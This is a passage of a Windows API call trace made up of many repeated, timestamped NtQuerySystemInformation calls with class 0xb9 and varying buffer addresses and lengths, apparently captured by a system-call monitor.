(SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0284.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, 